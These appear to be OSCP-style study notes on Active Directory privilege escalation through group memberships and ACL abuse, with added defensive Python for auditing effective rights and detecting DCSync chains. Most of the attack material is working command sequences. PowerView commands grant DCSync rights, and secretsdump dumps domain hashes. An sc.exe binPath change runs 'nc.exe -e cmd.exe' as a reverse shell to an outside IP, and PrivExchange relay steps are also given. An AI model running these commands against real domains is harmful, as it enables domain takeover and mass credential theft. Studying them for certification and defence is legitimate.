Vulnerable Groups

In admin groups but running in a "MANDATORY LABEL\MEDIUM" integrity context (UAC-filtered token)? Try the UAC bypass technique:
https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-main.md#user-account-control-uac-bypass

17.6 - MIC & UAC

In OSCP-style Active Directory (AD) labs, “group exploitation” usually means abusing group memberships, delegated rights, or misconfigurations to escalate privileges or move laterally. The core question is: “What groups is my user in, and what does that really let me do?” That means:

  • Enumerating effective rights, not just direct memberships
  • Enumerating where those effective rights apply
  • Understanding what those rights allow us to do on the target
  • Following group nesting manually or with enumeration tools
  • Verifying who else is logging in to these systems

Any group change in AD? Log off, then log on again, so the access token picks up the new group SID.
Do not mix -Credential (explicit credentials) with token-based abuse: the ACL must be written and used by the same token.
BloodHound shows possible paths.

Over-Privileged or Forgotten Groups (Low-Hanging Fruit)

A domain user is a member of:

  • Domain Admins
  • Enterprise Admins
  • Administrators (local on DCs or servers)
  • Backup Operators
  • Account Operators
  • Custom groups with dangerous rights
Group                      Why it's relevant
-------------------------  ---------------------------
Domain Admins              Full domain control
Backup Operators           NTDS.dit access
Account Operators          User/group modification
Server Operators           Service abuse
Administrators             Local admin everywhere
Custom IT/Support groups   Often over-privileged

Some built-in groups grant privilege escalation without exploits.

  • Backup Operators → Can read NTDS.dit → dump domain hashes
  • Account Operators → Can modify users/groups (except DAs) → add yourself somewhere useful
  • Server Operators → Can start/stop services → abuse service paths

Write Permissions on Groups (ACL Abuse)

You have permissions like this on a group object:

  • WriteMembers
  • GenericWrite
  • GenericAll
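The notes above say to enumerate effective rights rather than direct memberships, follow group nesting, and look for write rights on group objects. The following is an added example (not from the original notes, and not BloodHound's or PowerView's code) of that audit done offline in Python: it takes a constructed snapshot of direct memberships and group ACEs, treats both "MemberOf" and "WriteMembers/GenericWrite/GenericAll" (plus WriteDacl/WriteOwner, which also end in membership control) as edges, and reports every path from a principal to a privileged built-in group. All principal and group names are made up for the example.

```python
"""Effective-rights audit: which principals can reach a privileged group through
group nesting or through write rights on a group object.

Added example, not from the original notes. The directory snapshot below is
constructed; in practice it would come from an LDAP/PowerView/BloodHound export.
"""
from collections import deque

# Built-in groups from the notes' table (the targets of the audit).
PRIVILEGED_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Administrators",
    "Backup Operators", "Account Operators", "Server Operators",
}

# Rights on a group object that let the holder control its membership.
# WriteMembers/GenericWrite/GenericAll are from the notes; WriteDacl/WriteOwner
# are added because they let the holder grant themselves those rights.
GROUP_WRITE_RIGHTS = {"WriteMembers", "GenericWrite", "GenericAll", "WriteDacl", "WriteOwner"}

# Constructed snapshot: direct memberships, principal -> set of groups.
MEMBER_OF = {
    "svc-alfresco": {"Service Accounts"},
    "Service Accounts": {"Privileged IT Accounts"},
    "Privileged IT Accounts": {"Account Operators"},
    "helpdesk1": {"Helpdesk"},
    "bob": {"Printer Users"},
}

# Constructed snapshot: (principal, right, target group) ACEs on group objects.
GROUP_ACES = [
    ("Helpdesk", "WriteMembers", "Server Operators"),   # the classic over-delegation
    ("Printer Users", "GenericWrite", "Printer Users"),  # harmless self-loop; must not hang the search
    ("bob", "ReadProperty", "Domain Admins"),            # read-only right, not an edge
]


def build_edges(member_of, group_aces):
    """Turn memberships and membership-controlling ACEs into a directed graph.

    Each edge is (label, target): label is "MemberOf" or the ACE right name.
    """
    edges = {}
    for principal, groups in member_of.items():
        for group in groups:
            edges.setdefault(principal, []).append(("MemberOf", group))
    for principal, right, target in group_aces:
        if right in GROUP_WRITE_RIGHTS:
            edges.setdefault(principal, []).append((right, target))
    return edges


def reachable_privileged(principal, edges):
    """BFS from one principal; returns {privileged group: human-readable path}.

    The `seen` set stops cycles (e.g. a group with write rights on itself).
    """
    paths = {}
    seen = {principal}
    queue = deque([(principal, [principal])])
    while queue:
        node, path = queue.popleft()
        for right, target in edges.get(node, []):
            new_path = path + [f"-{right}->", target]
            if target in PRIVILEGED_GROUPS and target not in paths:
                paths[target] = " ".join(new_path)
            if target not in seen:
                seen.add(target)
                queue.append((target, new_path))
    return paths


def audit(member_of, group_aces, principals):
    """Audit every listed principal; returns {principal: {privileged group: path}}."""
    edges = build_edges(member_of, group_aces)
    return {p: reachable_privileged(p, edges) for p in principals}


if __name__ == "__main__":
    for principal, hits in audit(MEMBER_OF, GROUP_ACES, ["svc-alfresco", "helpdesk1", "bob"]).items():
        if not hits:
            print(f"{principal}: no path to a privileged group")
        for group, path in hits.items():
            print(f"{principal} -> {group}: {path}")
```

Run as-is, it reports that svc-alfresco is an effective member of Account Operators through three levels of nesting, and that helpdesk1 can take Server Operators because a group it belongs to holds WriteMembers on it, while bob has no path. The same traversal is what "Bloodhound shows possible paths" does at scale; for a real audit, feed it the full membership and ACE export and run it for every non-admin principal.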

Local Admin via Group Policy (GPO Groups)

A domain group is added to the local Administrators group on servers or workstations, applied via GPO.

Why it matters

  • Local admin = credential theft = domain escalation
  • You’re not Domain Admin
  • But you’re in a group that is local admin on a server

That server has:

  • DA logged in
  • Service account creds
  • Cached domain credentials

DCSync via Exchange Windows Permissions

BloodHound's help text gives instructions for this, but they don't always work as written, mainly because the access token is not refreshed after the group change (see the notes at the top).

Verify group membership (AD state)

  • Confirms whether the user is actually in the group in AD (as opposed to in the current access token). AD updates immediately; Windows access tokens do not.

Get-DomainGroupMember "Exchange Windows Permissions" |
  Where-Object {$_.MemberName -eq "svc-alfresco"}

Add a user to the group (if not already present)

  • Modifies the AD group membership; the logon token is NOT updated yet.

Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Members "svc-alfresco"

Force Windows to rebuild the access token so it includes the new group SID.

logoff -> logon

Grant DCSync rights on the domain

  • Uses the live logon token. Exchange Windows Permissions has WriteDacl on the domain object, which allows adding the replication (DCSync) rights.

Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc-alfresco -Rights DCSync -Verbose

Dump domain secrets

secretsdump.py htb.local/svc-alfresco@dc.htb.local
pypykatz registry --sam sam.hive system.hive
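Each step of the chain above leaves a distinct Security-log trace: the group add (event 4728/4732/4756 depending on group scope), the ACL change on the domain object (event 5136 on nTSecurityDescriptor, needs Directory Service Changes auditing), and the replication request itself (event 4662 carrying the DS-Replication-Get-Changes GUIDs, needs a DS Access SACL on the domain object). The following is an added example, not from the original notes or from any tool the notes mention, of detection logic that correlates these three over constructed, simplified key=value renderings of such events. The event IDs and the two replication-right GUIDs are real Windows/AD values; the log lines, account names and the domain are constructed.

```python
"""Detect the group-add -> domain-ACL-change -> DCSync chain from Security-log events.

Added example, not from the original notes. Event IDs and control-access-right
GUIDs are real; the sample lines are constructed, simplified key=value renderings
of Security events, not real exports.
"""

# Control-access rights a DCSync needs (real AD extended-right GUIDs).
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL}

# "Member added" events: 4728 global, 4732 domain-local, 4756 universal group.
GROUP_ADD_EVENTS = {"4728", "4732", "4756"}

# Groups from the notes' table plus the Exchange group used for the DCSync path.
SENSITIVE_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Administrators", "Backup Operators",
    "Account Operators", "Server Operators", "Exchange Windows Permissions",
}

CHAIN = {"sensitive_group_add", "domain_acl_change", "dcsync"}

# Constructed sample lines (not real logs): field=value pairs separated by ';'.
SAMPLE_LOG = """\
EventID=4756;Subject=HTB\\svc-alfresco;Group=Exchange Windows Permissions;Member=CN=svc-alfresco,CN=Users,DC=htb,DC=local
EventID=4728;Subject=HTB\\helpdesk1;Group=Printer Users;Member=CN=bob,CN=Users,DC=htb,DC=local
EventID=5136;Subject=HTB\\svc-alfresco;Object=DC=htb,DC=local;Attribute=nTSecurityDescriptor;Operation=Value Added
EventID=4662;Subject=HTB\\DC01$;Object=DC=htb,DC=local;Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662;Subject=HTB\\svc-alfresco;Object=DC=htb,DC=local;Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
"""


def parse_line(line):
    """Split 'k=v;k=v' into a dict; the first '=' separates key from value so DNs survive."""
    parts = [p for p in line.strip().split(";") if "=" in p]
    return {k: v for k, v in (p.split("=", 1) for p in parts)}


def is_machine_account(subject):
    """Coarse DC filter: machine accounts end in '$'. DCs replicate legitimately;
    a real deployment should compare against the actual DC list instead."""
    return subject.split("\\")[-1].endswith("$")


def detect(lines):
    """Return one finding per suspicious event: {'kind', 'subject', 'detail'}."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue
        eid, subject = ev.get("EventID"), ev.get("Subject", "")
        if eid in GROUP_ADD_EVENTS and ev.get("Group") in SENSITIVE_GROUPS:
            findings.append({"kind": "sensitive_group_add", "subject": subject,
                             "detail": f"{ev.get('Member')} added to {ev['Group']}"})
        elif (eid == "5136" and ev.get("Attribute") == "nTSecurityDescriptor"
              and ev.get("Object", "").startswith("DC=")):
            findings.append({"kind": "domain_acl_change", "subject": subject,
                             "detail": f"ACL of {ev['Object']} modified"})
        elif eid == "4662" and not is_machine_account(subject):
            if set(ev.get("Properties", "").split()) & REPLICATION_GUIDS:
                findings.append({"kind": "dcsync", "subject": subject,
                                 "detail": f"replication rights used on {ev.get('Object')}"})
    return findings


def chained_subjects(findings):
    """Subjects that appear in all three stages: the strongest signal of this playbook."""
    by_subject = {}
    for f in findings:
        by_subject.setdefault(f["subject"], set()).add(f["kind"])
    return {s for s, kinds in by_subject.items() if CHAIN <= kinds}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"[{f['kind']}] {f['subject']}: {f['detail']}")
    print("full chain by:", chained_subjects(found))
```

On the sample, the DC's own 4662 is ignored, the helpdesk add to a non-sensitive group is ignored, and svc-alfresco trips all three stages. Any single stage is worth an alert on its own (a non-DC principal using replication rights in particular), but correlating by subject within a short window is what separates this playbook from routine admin work.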

Server Operator Group

The Server Operator group is a special user group that often has access to powerful commands and settings on a computer system. This group is typically used for managing a server or for troubleshooting system problems. Server Operators are usually responsible for monitoring the server’s performance, managing system security, and providing technical support to users. They may also oversee installing software updates, creating and maintaining user accounts, and performing routine maintenance tasks.
https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

Look for a service whose binary path runs with privileges (evil-winrm's built-in services command lists services with their binary paths):

services

Use the netcat binary (sc.exe needs a space after binPath=):

upload /usr/share/windows-binaries/nc.exe
sc.exe config VMTools binPath= "C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234"

Start and stop the service while using a listener

sc.exe stop VMTools
sc.exe start VMTools

Dangerous Built-in Groups Usage (AdminCount=1 objects)

Get-ADUser -LDAPFilter "(&(objectcategory=person)(samaccountname=*)(admincount=1))"
Get-ADGroup -LDAPFilter "(&(objectcategory=group)(admincount=1))"

or

([adsisearcher]"(AdminCount=1)").findall()

Trust relationship between domains

nltest /trusted_domains

or

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

PrivExchange Attack

Exchange your privileges for Domain Admin privs by abusing Exchange. You need a shell on a user account with a mailbox.

  1. Subscribe to the push notification feature (using privexchange.py or powerPriv); this uses the credentials of the current user to authenticate to the Exchange server.

https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx

https://github.com/G0ldenGunSec/PowerPriv

powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

  2. Relay the Exchange server authentication and escalate privileges (using ntlmrelayx from Impacket).
  3. Profit using secretsdump: the user can now DCSync and get other users' NTLM hashes.

python secretsdump.py xxxxxxxxxx -just-dc